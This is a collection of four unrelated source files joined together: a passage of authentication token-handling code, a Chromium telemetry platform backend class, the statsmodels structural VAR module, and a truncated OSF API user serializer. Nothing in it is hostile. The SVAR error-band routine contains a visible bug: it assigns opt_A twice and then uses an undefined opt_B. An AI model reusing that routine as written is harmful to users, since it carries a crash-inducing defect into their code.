token_type == models.TOKEN_TYPE_LONG_LIVED_ACCESS_TOKEN
and client_name is None
):
raise ValueError("Client_name is required for long-lived access token")
if token_type == models.TOKEN_TYPE_LONG_LIVED_ACCESS_TOKEN:
for token in user.refresh_tokens.values():
if (
token.client_name == client_name
and token.token_type == models.TOKEN_TYPE_LONG_LIVED_ACCESS_TOKEN
):
# Each client_name can only have one
# long_lived_access_token type of refresh token
raise ValueError(f"{client_name} already exists")
return await self._store.async_create_refresh_token(
user,
client_id,
client_name,
client_icon,
token_type,
access_token_expiration,
credential,
)
async def async_get_refresh_token(
self, token_id: str
) -> models.RefreshToken | None:
"""Get refresh token by id."""
return await self._store.async_get_refresh_token(token_id)
async def async_get_refresh_token_by_token(
self, token: str
) -> models.RefreshToken | None:
"""Get refresh token by token."""
return await self._store.async_get_refresh_token_by_token(token)
async def async_remove_refresh_token(
self, refresh_token: models.RefreshToken
) -> None:
"""Delete a refresh token."""
await self._store.async_remove_refresh_token(refresh_token)
callbacks = self._revoke_callbacks.pop(refresh_token.id, [])
for revoke_callback in callbacks:
revoke_callback()
@callback
def async_register_revoke_token_callback(
self, refresh_token_id: str, revoke_callback: CALLBACK_TYPE
) -> CALLBACK_TYPE:
"""Register a callback to be called when the refresh token id is revoked."""
if refresh_token_id not in self._revoke_callbacks:
self._revoke_callbacks[refresh_token_id] = []
callbacks = self._revoke_callbacks[refresh_token_id]
callbacks.append(revoke_callback)
@callback
def unregister() -> None:
if revoke_callback in callbacks:
callbacks.remove(revoke_callback)
return unregister
@callback
def async_create_access_token(
self, refresh_token: models.RefreshToken, remote_ip: str | None = None
) -> str:
"""Create a new access token."""
self.async_validate_refresh_token(refresh_token, remote_ip)
self._store.async_log_refresh_token_usage(refresh_token, remote_ip)
now = dt_util.utcnow()
return jwt.encode(
{
"iss": refresh_token.id,
"iat": now,
"exp": now + refresh_token.access_token_expiration,
},
refresh_token.jwt_key,
algorithm="HS256",
)
@callback
def _async_resolve_provider(
self, refresh_token: models.RefreshToken
) -> AuthProvider | None:
"""Get the auth provider for the given refresh token.
Raises an exception if the expected provider is no longer available or return
None if no provider was expected for this refresh token.
"""
if refresh_token.credential is None:
return None
provider = self.get_auth_provider(
refresh_token.credential.auth_provider_type,
refresh_token.credential.auth_provider_id,
)
if provider is None:
raise InvalidProvider(
f"Auth provider {refresh_token.credential.auth_provider_type}, {refresh_token.credential.auth_provider_id} not available"
)
return provider
@callback
def async_validate_refresh_token(
self, refresh_token: models.RefreshToken, remote_ip: str | None = None
) -> None:
"""Validate that a refresh token is usable.
Will raise InvalidAuthError on errors.
"""
if provider := self._async_resolve_provider(refresh_token):
provider.async_validate_refresh_token(refresh_token, remote_ip)
async def async_validate_access_token(
self, token: str
) -> models.RefreshToken | None:
"""Return refresh token if an access token is valid."""
try:
unverif_claims = jwt.decode(
token, algorithms=["HS256"], options={"verify_signature": False}
)
except jwt.InvalidTokenError:
return None
refresh_token = await self.async_get_refresh_token(
cast(str, unverif_claims.get("iss"))
)
if refresh_token is None:
jwt_key = ""
issuer = ""
else:
jwt_key = refresh_token.jwt_key
issuer = refresh_token.id
try:
jwt.decode(token, jwt_key, leeway=10, issuer=issuer, algorithms=["HS256"])
except jwt.InvalidTokenError:
return None
if refresh_token is None or not refresh_token.user.is_active:
return None
return refresh_token
@callback
def _async_get_auth_provider(
self, credentials: models.Credentials
) -> AuthProvider | None:
"""Get auth provider from a set of credentials."""
auth_provider_key = (
credentials.auth_provider_type,
credentials.auth_provider_id,
)
return self._providers.get(auth_provider_key)
async def _user_should_be_owner(self) -> bool:
"""Determine if user should be owner.
A user should be an owner if it is the first non-system user that is
being created.
"""
for user in await self._store.async_get_users():
if not user.system_generated:
return False
return True
| |
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import weakref
from telemetry.internal.forwarders import do_nothing_forwarder
from telemetry.internal.platform import network_controller_backend
from telemetry.internal.platform import tracing_controller_backend
# pylint: disable=W0613
class PlatformBackend(object):
def __init__(self, device=None):
""" Initalize an instance of PlatformBackend from a device optionally.
Call sites need to use SupportsDevice before intialization to check
whether this platform backend supports the device.
If device is None, this constructor returns the host platform backend
which telemetry is running on.
Args:
device: an instance of telemetry.core.platform.device.Device.
"""
if device and not self.SupportsDevice(device):
raise ValueError('Unsupported device: %s' % device.name)
self._platform = None
self._running_browser_backends = weakref.WeakSet()
self._network_controller_backend = None
self._tracing_controller_backend = None
self._forwarder_factory = None
def InitPlatformBackend(self):
self._network_controller_backend = (
network_controller_backend.NetworkControllerBackend(self))
self._tracing_controller_backend = (
tracing_controller_backend.TracingControllerBackend(self))
@classmethod
def IsPlatformBackendForHost(cls):
""" Returns whether this platform backend is the platform backend to be used
for the host device which telemetry is running on. """
return False
@classmethod
def SupportsDevice(cls, device):
""" Returns whether this platform backend supports intialization from the
device. """
return False
@classmethod
def CreatePlatformForDevice(cls, device, finder_options):
raise NotImplementedError
def SetPlatform(self, platform):
assert self._platform == None
self._platform = platform
@property
def platform(self):
return self._platform
@property
def is_host_platform(self):
return self._platform.is_host_platform
@property
def running_browser_backends(self):
return list(self._running_browser_backends)
@property
def network_controller_backend(self):
return self._network_controller_backend
@property
def tracing_controller_backend(self):
return self._tracing_controller_backend
@property
def forwarder_factory(self):
if not self._forwarder_factory:
self._forwarder_factory = do_nothing_forwarder.DoNothingForwarderFactory()
return self._forwarder_factory
def GetRemotePort(self, port):
return port
def DidCreateBrowser(self, browser, browser_backend):
browser_options = browser_backend.browser_options
self.SetFullPerformanceModeEnabled(browser_options.full_performance_mode)
# TODO(slamm): Remove this call when replay browser_backend dependencies
# get moved to platform. https://crbug.com/423962
self._network_controller_backend.UpdateReplay(browser_backend)
def DidStartBrowser(self, browser, browser_backend):
assert browser not in self._running_browser_backends
self._running_browser_backends.add(browser_backend)
def WillCloseBrowser(self, browser, browser_backend):
# TODO(slamm): Move this call when replay's life cycle is no longer
# tied to the browser. https://crbug.com/424777
self._network_controller_backend.StopReplay()
is_last_browser = len(self._running_browser_backends) <= 1
if is_last_browser:
self.SetFullPerformanceModeEnabled(False)
self._running_browser_backends.discard(browser_backend)
@property
def wpr_http_device_port(self):
return self._network_controller_backend.wpr_http_device_port
@property
def wpr_https_device_port(self):
return self._network_controller_backend.wpr_https_device_port
def IsDisplayTracingSupported(self):
return False
def StartDisplayTracing(self):
"""Start gathering a trace with frame timestamps close to physical
display."""
raise NotImplementedError()
def StopDisplayTracing(self):
"""Stop gathering a trace with frame timestamps close to physical display.
Returns a raw tracing events that contains the timestamps of physical
display.
"""
raise NotImplementedError()
def SetFullPerformanceModeEnabled(self, enabled):
pass
def CanMonitorThermalThrottling(self):
return False
def IsThermallyThrottled(self):
raise NotImplementedError()
def HasBeenThermallyThrottled(self):
raise NotImplementedError()
def GetSystemCommitCharge(self):
raise NotImplementedError()
def GetSystemTotalPhysicalMemory(self):
raise NotImplementedError()
def GetCpuStats(self, pid):
return {}
def GetCpuTimestamp(self):
return {}
def PurgeUnpinnedMemory(self):
pass
def GetMemoryStats(self, pid):
return {}
def GetChildPids(self, pid):
raise NotImplementedError()
def GetCommandLine(self, pid):
raise NotImplementedError()
def GetDeviceTypeName(self):
raise NotImplementedError()
def GetArchName(self):
raise NotImplementedError()
def GetOSName(self):
raise NotImplementedError()
def GetOSVersionName(self):
raise NotImplementedError()
def CanFlushIndividualFilesFromSystemCache(self):
raise NotImplementedError()
def FlushEntireSystemCache(self):
raise NotImplementedError()
def FlushSystemCacheForDirectory(self, directory):
raise NotImplementedError()
def FlushDnsCache(self):
pass
def LaunchApplication(
self, application, parameters=None, elevate_privilege=False):
raise NotImplementedError()
def IsApplicationRunning(self, application):
raise NotImplementedError()
def CanLaunchApplication(self, application):
return False
def InstallApplication(self, application):
raise NotImplementedError()
def CanCaptureVideo(self):
return False
def StartVideoCapture(self, min_bitrate_mbps):
raise NotImplementedError()
@property
def is_video_capture_running(self):
return False
def StopVideoCapture(self):
raise NotImplementedError()
def CanMonitorPower(self):
return False
def CanMeasurePerApplicationPower(self):
return False
def StartMonitoringPower(self, browser):
raise NotImplementedError()
def StopMonitoringPower(self):
raise NotImplementedError()
def CanMonitorNetworkData(self):
return False
def GetNetworkData(self, browser):
raise NotImplementedError()
def ReadMsr(self, msr_number, start=0, length=64):
"""Read a CPU model-specific register (MSR).
Which MSRs are available depends on the CPU model.
On systems with multiple CPUs, this function may run on any CPU.
Args:
msr_number: The number of the register to read.
start: The least significant bit to read, zero-indexed.
(Said another way, the number of bits to right-shift the MSR value.)
length: The number of bits to read. MSRs are 64 bits, even on 32-bit CPUs.
"""
raise NotImplementedError()
@property
def wpr_ca_cert_path(self):
return None
def CanTakeScreenshot(self):
return False
def TakeScreenshot(self, file_path):
raise NotImplementedError
def IsCooperativeShutdownSupported(self):
"""Indicates whether CooperativelyShutdown, below, is supported.
It is not necessary to implement it on all platforms."""
return False
def CooperativelyShutdown(self, proc, app_name):
"""Cooperatively shut down the given process from subprocess.Popen.
Currently this is only implemented on Windows. See
crbug.com/424024 for background on why it was added.
Args:
proc: a process object returned from subprocess.Popen.
app_name: on Windows, is the prefix of the application's window
class name that should be searched for. This helps ensure
that only the application's windows are closed.
Returns True if it is believed the attempt succeeded.
"""
raise NotImplementedError()
def PathExists(self, path, timeout=None, retries=None):
"""Tests whether the given path exists on the target platform.
Args:
path: path in request.
timeout: timeout.
retries: num of retries.
Return:
Whether the path exists on the target platform.
"""
raise NotImplementedError()
| |
"""
Vector Autoregression (VAR) processes
References
----------
Lutkepohl (2005) New Introduction to Multiple Time Series Analysis
"""
from __future__ import print_function, division
from statsmodels.compat.python import range
import numpy as np
import numpy.linalg as npl
from numpy.linalg import slogdet
from statsmodels.tools.numdiff import (approx_hess, approx_fprime)
from statsmodels.tools.decorators import cache_readonly
from statsmodels.tsa.vector_ar.irf import IRAnalysis
from statsmodels.tsa.vector_ar.var_model import VARProcess, \
VARResults
import statsmodels.tsa.vector_ar.util as util
import statsmodels.tsa.base.tsa_model as tsbase
from statsmodels.compat.numpy import np_matrix_rank
mat = np.array
def svar_ckerr(svar_type, A, B):
if A is None and (svar_type == 'A' or svar_type == 'AB'):
raise ValueError('SVAR of type A or AB but A array not given.')
if B is None and (svar_type == 'B' or svar_type == 'AB'):
raise ValueError('SVAR of type B or AB but B array not given.')
class SVAR(tsbase.TimeSeriesModel):
"""
Fit VAR and then estimate structural components of A and B, defined:
.. math:: Ay_t = A_1 y_{t-1} + \ldots + A_p y_{t-p} + B\var(\epsilon_t)
Parameters
----------
endog : array-like
1-d endogenous response variable. The independent variable.
dates : array-like
must match number of rows of endog
svar_type : str
"A" - estimate structural parameters of A matrix, B assumed = I
"B" - estimate structural parameters of B matrix, A assumed = I
"AB" - estimate structural parameters indicated in both A and B matrix
A : array-like
neqs x neqs with unknown parameters marked with 'E' for estimate
B : array-like
neqs x neqs with unknown parameters marked with 'E' for estimate
References
----------
Hamilton (1994) Time Series Analysis
"""
def __init__(self, endog, svar_type, dates=None,
freq=None, A=None, B=None, missing='none'):
super(SVAR, self).__init__(endog, None, dates, freq, missing=missing)
#(self.endog, self.names,
# self.dates) = data_util.interpret_data(endog, names, dates)
self.y = self.endog #keep alias for now
self.neqs = self.endog.shape[1]
types = ['A', 'B', 'AB']
if svar_type not in types:
raise ValueError('SVAR type not recognized, must be in '
+ str(types))
self.svar_type = svar_type
svar_ckerr(svar_type, A, B)
#initialize A, B as I if not given
#Initialize SVAR masks
if A is None:
A = np.identity(self.neqs)
self.A_mask = A_mask = np.zeros(A.shape, dtype=bool)
else:
A_mask = np.logical_or(A == 'E', A == 'e')
self.A_mask = A_mask
if B is None:
B = np.identity(self.neqs)
self.B_mask = B_mask = np.zeros(B.shape, dtype=bool)
else:
B_mask = np.logical_or(B == 'E', B == 'e')
self.B_mask = B_mask
# convert A and B to numeric
#TODO: change this when masked support is better or with formula
#integration
Anum = np.zeros(A.shape, dtype=float)
Anum[~A_mask] = A[~A_mask]
Anum[A_mask] = np.nan
self.A = Anum
Bnum = np.zeros(B.shape, dtype=float)
Bnum[~B_mask] = B[~B_mask]
Bnum[B_mask] = np.nan
self.B = Bnum
#LikelihoodModel.__init__(self, endog)
#super(SVAR, self).__init__(endog)
def fit(self, A_guess=None, B_guess=None, maxlags=None, method='ols',
ic=None, trend='c', verbose=False, s_method='mle',
solver="bfgs", override=False, maxiter=500, maxfun=500):
"""
Fit the SVAR model and solve for structural parameters
Parameters
----------
A_guess : array-like, optional
A vector of starting values for all parameters to be estimated
in A.
B_guess : array-like, optional
A vector of starting values for all parameters to be estimated
in B.
maxlags : int
Maximum number of lags to check for order selection, defaults to
12 * (nobs/100.)**(1./4), see select_order function
method : {'ols'}
Estimation method to use
ic : {'aic', 'fpe', 'hqic', 'bic', None}
Information criterion to use for VAR order selection.
aic : Akaike
fpe : Final prediction error
hqic : Hannan-Quinn
bic : Bayesian a.k.a. Schwarz
verbose : bool, default False
Print order selection output to the screen
trend, str {"c", "ct", "ctt", "nc"}
"c" - add constant
"ct" - constant and trend
"ctt" - constant, linear and quadratic trend
"nc" - co constant, no trend
Note that these are prepended to the columns of the dataset.
s_method : {'mle'}
Estimation method for structural parameters
solver : {'nm', 'newton', 'bfgs', 'cg', 'ncg', 'powell'}
Solution method
See statsmodels.base for details
override : bool, default False
If True, returns estimates of A and B without checking
order or rank condition
maxiter : int, default 500
Number of iterations to perform in solution method
maxfun : int
Number of function evaluations to perform
Notes
-----
Lutkepohl pp. 146-153
Hamilton pp. 324-336
Returns
-------
est : SVARResults
"""
lags = maxlags
if ic is not None:
selections = self.select_order(maxlags=maxlags, verbose=verbose)
if ic not in selections:
raise Exception("%s not recognized, must be among %s"
% (ic, sorted(selections)))
lags = selections[ic]
if verbose:
print('Using %d based on %s criterion' % (lags, ic))
else:
if lags is None:
lags = 1
self.nobs = len(self.endog) - lags
# initialize starting parameters
start_params = self._get_init_params(A_guess, B_guess)
return self._estimate_svar(start_params, lags, trend=trend,
solver=solver, override=override,
maxiter=maxiter, maxfun=maxfun)
def _get_init_params(self, A_guess, B_guess):
"""
Returns either the given starting or .1 if none are given.
"""
var_type = self.svar_type.lower()
n_masked_a = self.A_mask.sum()
if var_type in ['ab', 'a']:
if A_guess is None:
A_guess = np.array([.1]*n_masked_a)
else:
if len(A_guess) != n_masked_a:
msg = 'len(A_guess) = %s, there are %s parameters in A'
raise ValueError(msg % (len(A_guess), n_masked_a))
else:
A_guess = []
n_masked_b = self.B_mask.sum()
if var_type in ['ab', 'b']:
if B_guess is None:
B_guess = np.array([.1]*n_masked_b)
else:
if len(B_guess) != n_masked_b:
msg = 'len(B_guess) = %s, there are %s parameters in B'
raise ValueError(msg % (len(B_guess), n_masked_b))
else:
B_guess = []
return np.r_[A_guess, B_guess]
def _estimate_svar(self, start_params, lags, maxiter, maxfun,
trend='c', solver="nm", override=False):
"""
lags : int
trend : string or None
As per above
"""
k_trend = util.get_trendorder(trend)
y = self.endog
z = util.get_var_endog(y, lags, trend=trend, has_constant='raise')
y_sample = y[lags:]
# Lutkepohl p75, about 5x faster than stated formula
var_params = np.linalg.lstsq(z, y_sample)[0]
resid = y_sample - np.dot(z, var_params)
# Unbiased estimate of covariance matrix $\Sigma_u$ of the white noise
# process $u$
# equivalent definition
# .. math:: \frac{1}{T - Kp - 1} Y^\prime (I_T - Z (Z^\prime Z)^{-1}
# Z^\prime) Y
# Ref: Lutkepohl p.75
# df_resid right now is T - Kp - 1, which is a suggested correction
avobs = len(y_sample)
df_resid = avobs - (self.neqs * lags + k_trend)
sse = np.dot(resid.T, resid)
#TODO: should give users the option to use a dof correction or not
omega = sse / df_resid
self.sigma_u = omega
A, B = self._solve_AB(start_params, override=override,
solver=solver,
maxiter=maxiter,
maxfun=maxfun)
A_mask = self.A_mask
B_mask = self.B_mask
return SVARResults(y, z, var_params, omega, lags,
names=self.endog_names, trend=trend,
dates=self.data.dates, model=self,
A=A, B=B, A_mask=A_mask, B_mask=B_mask)
def loglike(self, params):
"""
Loglikelihood for SVAR model
Notes
-----
This method assumes that the autoregressive parameters are
first estimated, then likelihood with structural parameters
is estimated
"""
#TODO: this doesn't look robust if A or B is None
A = self.A
B = self.B
A_mask = self.A_mask
B_mask = self.B_mask
A_len = len(A[A_mask])
B_len = len(B[B_mask])
if A is not None:
A[A_mask] = params[:A_len]
if B is not None:
B[B_mask] = params[A_len:A_len+B_len]
nobs = self.nobs
neqs = self.neqs
sigma_u = self.sigma_u
W = np.dot(npl.inv(B),A)
trc_in = np.dot(np.dot(W.T,W),sigma_u)
sign, b_logdet = slogdet(B**2) #numpy 1.4 compat
b_slogdet = sign * b_logdet
likl = -nobs/2. * (neqs * np.log(2 * np.pi) - \
np.log(npl.det(A)**2) + b_slogdet + \
np.trace(trc_in))
return likl
def score(self, AB_mask):
"""
Return the gradient of the loglike at AB_mask.
Parameters
----------
AB_mask : unknown values of A and B matrix concatenated
Notes
-----
Return numerical gradient
"""
loglike = self.loglike
return approx_fprime(AB_mask, loglike, epsilon=1e-8)
def hessian(self, AB_mask):
"""
Returns numerical hessian.
"""
loglike = self.loglike
return approx_hess(AB_mask, loglike)
def _solve_AB(self, start_params, maxiter, maxfun, override=False,
solver='bfgs'):
"""
Solves for MLE estimate of structural parameters
Parameters
----------
override : bool, default False
If True, returns estimates of A and B without checking
order or rank condition
solver : str or None, optional
Solver to be used. The default is 'nm' (Nelder-Mead). Other
choices are 'bfgs', 'newton' (Newton-Raphson), 'cg'
conjugate, 'ncg' (non-conjugate gradient), and 'powell'.
maxiter : int, optional
The maximum number of iterations. Default is 500.
maxfun : int, optional
The maximum number of function evalutions.
Returns
-------
A_solve, B_solve: ML solutions for A, B matrices
"""
#TODO: this could stand a refactor
A_mask = self.A_mask
B_mask = self.B_mask
A = self.A
B = self.B
A_len = len(A[A_mask])
A[A_mask] = start_params[:A_len]
B[B_mask] = start_params[A_len:]
if override == False:
J = self._compute_J(A, B)
self.check_order(J)
self.check_rank(J)
else: #TODO: change to a warning?
print("Order/rank conditions have not been checked")
retvals = super(SVAR, self).fit(start_params=start_params,
method=solver, maxiter=maxiter,
maxfun=maxfun, ftol=1e-20, disp=0).params
A[A_mask] = retvals[:A_len]
B[B_mask] = retvals[A_len:]
return A, B
def _compute_J(self, A_solve, B_solve):
#first compute appropriate duplication matrix
# taken from Magnus and Neudecker (1980),
#"The Elimination Matrix: Some Lemmas and Applications
# the creation of the D_n matrix follows MN (1980) directly,
#while the rest follows Hamilton (1994)
neqs = self.neqs
sigma_u = self.sigma_u
A_mask = self.A_mask
B_mask = self.B_mask
#first generate duplication matrix, see MN (1980) for notation
D_nT=np.zeros([(1.0/2)*(neqs)*(neqs+1),neqs**2])
for j in range(neqs):
i=j
while j <= i < neqs:
u=np.zeros([(1.0/2)*neqs*(neqs+1),1])
u[(j)*neqs+(i+1)-(1.0/2)*(j+1)*j-1]=1
Tij=np.zeros([neqs,neqs])
Tij[i,j]=1
Tij[j,i]=1
D_nT=D_nT+np.dot(u,(Tij.ravel('F')[:,None]).T)
i=i+1
D_n=D_nT.T
D_pl=npl.pinv(D_n)
#generate S_B
S_B = np.zeros((neqs**2, len(A_solve[A_mask])))
S_D = np.zeros((neqs**2, len(B_solve[B_mask])))
j = 0
j_d = 0
if len(A_solve[A_mask]) is not 0:
A_vec = np.ravel(A_mask, order='F')
for k in range(neqs**2):
if A_vec[k] == True:
S_B[k,j] = -1
j += 1
if len(B_solve[B_mask]) is not 0:
B_vec = np.ravel(B_mask, order='F')
for k in range(neqs**2):
if B_vec[k] == True:
S_D[k,j_d] = 1
j_d +=1
#now compute J
invA = npl.inv(A_solve)
J_p1i = np.dot(np.dot(D_pl, np.kron(sigma_u, invA)), S_B)
J_p1 = -2.0 * J_p1i
J_p2 = np.dot(np.dot(D_pl, np.kron(invA, invA)), S_D)
J = np.append(J_p1, J_p2, axis=1)
return J
def check_order(self, J):
if np.size(J, axis=0) < np.size(J, axis=1):
raise ValueError("Order condition not met: "
"solution may not be unique")
def check_rank(self, J):
rank = np_matrix_rank(J)
if rank < np.size(J, axis=1):
raise ValueError("Rank condition not met: "
"solution may not be unique.")
class SVARProcess(VARProcess):
"""
Class represents a known SVAR(p) process
Parameters
----------
coefs : ndarray (p x k x k)
intercept : ndarray (length k)
sigma_u : ndarray (k x k)
names : sequence (length k)
A : neqs x neqs np.ndarray with unknown parameters marked with 'E'
A_mask : neqs x neqs mask array with known parameters masked
B : neqs x neqs np.ndarry with unknown parameters marked with 'E'
B_mask : neqs x neqs mask array with known parameters masked
Returns
-------
**Attributes**:
"""
def __init__(self, coefs, intercept, sigma_u, A_solve, B_solve,
names=None):
self.k_ar = len(coefs)
self.neqs = coefs.shape[1]
self.coefs = coefs
self.intercept = intercept
self.sigma_u = sigma_u
self.A_solve = A_solve
self.B_solve = B_solve
self.names = names
def orth_ma_rep(self, maxn=10, P=None):
"""
Unavailable for SVAR
"""
raise NotImplementedError
def svar_ma_rep(self, maxn=10, P=None):
"""
Compute Structural MA coefficient matrices using MLE
of A, B
"""
if P is None:
A_solve = self.A_solve
B_solve = self.B_solve
P = np.dot(npl.inv(A_solve), B_solve)
ma_mats = self.ma_rep(maxn=maxn)
return mat([np.dot(coefs, P) for coefs in ma_mats])
class SVARResults(SVARProcess, VARResults):
"""
Estimate VAR(p) process with fixed number of lags
Parameters
----------
endog : array
endog_lagged : array
params : array
sigma_u : array
lag_order : int
model : VAR model instance
trend : str {'nc', 'c', 'ct'}
names : array-like
List of names of the endogenous variables in order of appearance in `endog`.
dates
Returns
-------
**Attributes**
aic
bic
bse
coefs : ndarray (p x K x K)
Estimated A_i matrices, A_i = coefs[i-1]
cov_params
dates
detomega
df_model : int
df_resid : int
endog
endog_lagged
fittedvalues
fpe
intercept
info_criteria
k_ar : int
k_trend : int
llf
model
names
neqs : int
Number of variables (equations)
nobs : int
n_totobs : int
params
k_ar : int
Order of VAR process
params : ndarray (Kp + 1) x K
A_i matrices and intercept in stacked form [int A_1 ... A_p]
pvalue
names : list
variables names
resid
sigma_u : ndarray (K x K)
Estimate of white noise process variance Var[u_t]
sigma_u_mle
stderr
trenorder
tvalues
y :
ys_lagged
"""
_model_type = 'SVAR'
def __init__(self, endog, endog_lagged, params, sigma_u, lag_order,
A=None, B=None, A_mask=None, B_mask=None, model=None,
trend='c', names=None, dates=None):
self.model = model
self.y = self.endog = endog #keep alias for now
self.ys_lagged = self.endog_lagged = endog_lagged #keep alias for now
self.dates = dates
self.n_totobs, self.neqs = self.y.shape
self.nobs = self.n_totobs - lag_order
k_trend = util.get_trendorder(trend)
if k_trend > 0: # make this the polynomial trend order
trendorder = k_trend - 1
else:
trendorder = None
self.k_trend = k_trend
self.trendorder = trendorder
self.exog_names = util.make_lag_names(names, lag_order, k_trend)
self.params = params
self.sigma_u = sigma_u
# Each matrix needs to be transposed
reshaped = self.params[self.k_trend:]
reshaped = reshaped.reshape((lag_order, self.neqs, self.neqs))
# Need to transpose each coefficient matrix
intercept = self.params[0]
coefs = reshaped.swapaxes(1, 2).copy()
#SVAR components
#TODO: if you define these here, you don't also have to define
#them in SVAR process, but I left them for now -ss
self.A = A
self.B = B
self.A_mask = A_mask
self.B_mask = B_mask
super(SVARResults, self).__init__(coefs, intercept, sigma_u, A,
B, names=names)
def irf(self, periods=10, var_order=None):
"""
Analyze structural impulse responses to shocks in system
Parameters
----------
periods : int
Returns
-------
irf : IRAnalysis
"""
A = self.A
B= self.B
P = np.dot(npl.inv(A), B)
return IRAnalysis(self, P=P, periods=periods, svar=True)
def sirf_errband_mc(self, orth=False, repl=1000, T=10,
signif=0.05, seed=None, burn=100, cum=False):
"""
Compute Monte Carlo integrated error bands assuming normally
distributed for impulse response functions
Parameters
----------
orth: bool, default False
Compute orthoganalized impulse response error bands
repl: int
number of Monte Carlo replications to perform
T: int, default 10
number of impulse response periods
signif: float (0 < signif <1)
Significance level for error bars, defaults to 95% CI
seed: int
np.random.seed for replications
burn: int
number of initial observations to discard for simulation
cum: bool, default False
produce cumulative irf error bands
Notes
-----
Lutkepohl (2005) Appendix D
Returns
-------
Tuple of lower and upper arrays of ma_rep monte carlo standard errors
"""
neqs = self.neqs
mean = self.mean()
k_ar = self.k_ar
coefs = self.coefs
sigma_u = self.sigma_u
intercept = self.intercept
df_model = self.df_model
nobs = self.nobs
ma_coll = np.zeros((repl, T+1, neqs, neqs))
A = self.A
B = self.B
A_mask = self.A_mask
B_mask = self.B_mask
A_pass = np.zeros(A.shape, dtype='|S1')
B_pass = np.zeros(B.shape, dtype='|S1')
A_pass[~A_mask] = A[~A_mask]
B_pass[~B_mask] = B[~B_mask]
A_pass[A_mask] = 'E'
B_pass[B_mask] = 'E'
if A_mask.sum() == 0:
s_type = 'B'
elif B_mask.sum() == 0:
s_type = 'A'
else:
s_type = 'AB'
g_list = []
for i in range(repl):
#discard first hundred to correct for starting bias
sim = util.varsim(coefs, intercept, sigma_u,
steps=nobs+burn)
sim = sim[burn:]
if cum == True:
if i < 10:
sol = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar)
g_list.append(np.append(sol.A[sol.A_mask].\
tolist(),
sol.B[sol.B_mask].\
tolist()))
ma_coll[i] = sol.svar_ma_rep(maxn=T).cumsum(axis=0)
elif i >= 10:
if i == 10:
mean_AB = np.mean(g_list, axis = 0)
split = len(A_pass[A_mask])
opt_A = mean_AB[:split]
opt_A = mean_AB[split:]
ma_coll[i] = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar,\
A_guess=opt_A, B_guess=opt_B).\
svar_ma_rep(maxn=T).cumsum(axis=0)
elif cum == False:
if i < 10:
sol = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar)
g_list.append(np.append(sol.A[A_mask].tolist(),
sol.B[B_mask].tolist()))
ma_coll[i] = sol.svar_ma_rep(maxn=T)
elif i >= 10:
if i == 10:
mean_AB = np.mean(g_list, axis = 0)
split = len(A[A_mask])
opt_A = mean_AB[:split]
opt_B = mean_AB[split:]
ma_coll[i] = SVAR(sim, svar_type=s_type, A=A_pass,
B=B_pass).fit(maxlags=k_ar,\
A_guess = opt_A, B_guess = opt_B).\
svar_ma_rep(maxn=T)
ma_sort = np.sort(ma_coll, axis=0) #sort to get quantiles
index = round(signif/2*repl)-1,round((1-signif/2)*repl)-1
lower = ma_sort[index[0],:, :, :]
upper = ma_sort[index[1],:, :, :]
return lower, upper
| |
from guardian.models import GroupObjectPermission
from django.utils import timezone
from rest_framework import serializers as ser
from api.base.exceptions import InvalidModelValueError
from api.base.serializers import (
BaseAPISerializer, JSONAPISerializer, JSONAPIRelationshipSerializer,
VersionedDateTimeField, HideIfDisabled, IDField,
Link, LinksField, ListDictField, TypeField, RelationshipField, JSONAPIListField,
WaterbutlerLink, ShowIfCurrentUser
)
from api.base.utils import absolute_reverse, get_user_auth, waterbutler_api_url_for
from api.files.serializers import QuickFilesSerializer
from osf.exceptions import ValidationValueError, ValidationError
from osf.models import OSFUser, QuickFilesNode
from api.users.schemas.utils import validate_user_json
class QuickFilesRelationshipField(RelationshipField):
def to_representation(self, value):
relationship_links = super(QuickFilesRelationshipField, self).to_representation(value)
quickfiles_guid = value.nodes_created.filter(type=QuickFilesNode._typedmodels_type).values_list('guids___id', flat=True).get()
upload_url = waterbutler_api_url_for(quickfiles_guid, 'osfstorage')
relationship_links['links']['upload'] = {
'href': upload_url,
'meta': {}
}
relationship_links['links']['download'] = {
'href': '{}?zip='.format(upload_url),
'meta': {}
}
return relationship_links
class UserSerializer(JSONAPISerializer):
filterable_fields = frozenset([
'full_name',
'given_name',
'middle_names',
'family_name',
'id'
])
writeable_method_fields = frozenset([
'accepted_terms_of_service',
])
non_anonymized_fields = ['type']
id = IDField(source='_id', read_only=True)
type = TypeField()
full_name = ser.CharField(source='fullname', required=True, label='Full name', help_text='Display name used in the general user interface', max_length=186)
given_name = ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations')
middle_names = ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations')
family_name = ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations')
suffix = HideIfDisabled(ser.CharField(required=False, allow_blank=True, help_text='For bibliographic citations'))
date_registered = HideIfDisabled(VersionedDateTimeField(read_only=True))
active = HideIfDisabled(ser.BooleanField(read_only=True, source='is_active'))
timezone = HideIfDisabled(ser.CharField(required=False, help_text="User's timezone, e.g. 'Etc/UTC"))
locale = HideIfDisabled(ser.CharField(required=False, help_text="User's locale, e.g. 'en_US'"))
social = ListDictField(required=False)
employment = JSONAPIListField(required=False, source='jobs')
education = JSONAPIListField(required=False, source='schools')
can_view_reviews = ShowIfCurrentUser(ser.SerializerMethodField(help_text='Whether the current user has the `view_submissions` permission to ANY reviews provider.'))
accepted_terms_of_service = ShowIfCurrentUser(ser.SerializerMethodField())
links = HideIfDisabled(LinksField(
{
'html': 'absolute_url',
'profile_image': 'profile_image_url',
}
))
nodes = HideIfDisabled(RelationshipField(
related_view='users:user-nodes',
related_view_kwargs={'user_id': '<_id>'},
related_meta={'projects_in_common': 'get_projects_in_common'},
))
quickfiles = HideIfDisabled(QuickFilesRelationshipField(
related_view='users:user-quickfiles',
related_view_kwargs={'user_id': '<_id>'},
))
registrations = HideIfDisabled(RelationshipField(
related_view='users:user-registrations',
related_view_kwargs={'user_id': '<_id>'},
))
institutions = HideIfDisabled(RelationshipField(
related_view='users:user-institutions',
related_view_kwargs={'user_id': '<_id>'},
self_view='users:user-institutions-relationship',
self_view_kwargs={'user_id': '<_id>'},
))
preprints = HideIfDisabled(RelationshipField(
related_view='users:user-preprints',
related_view_kwargs={'user_id': '<_id>'},
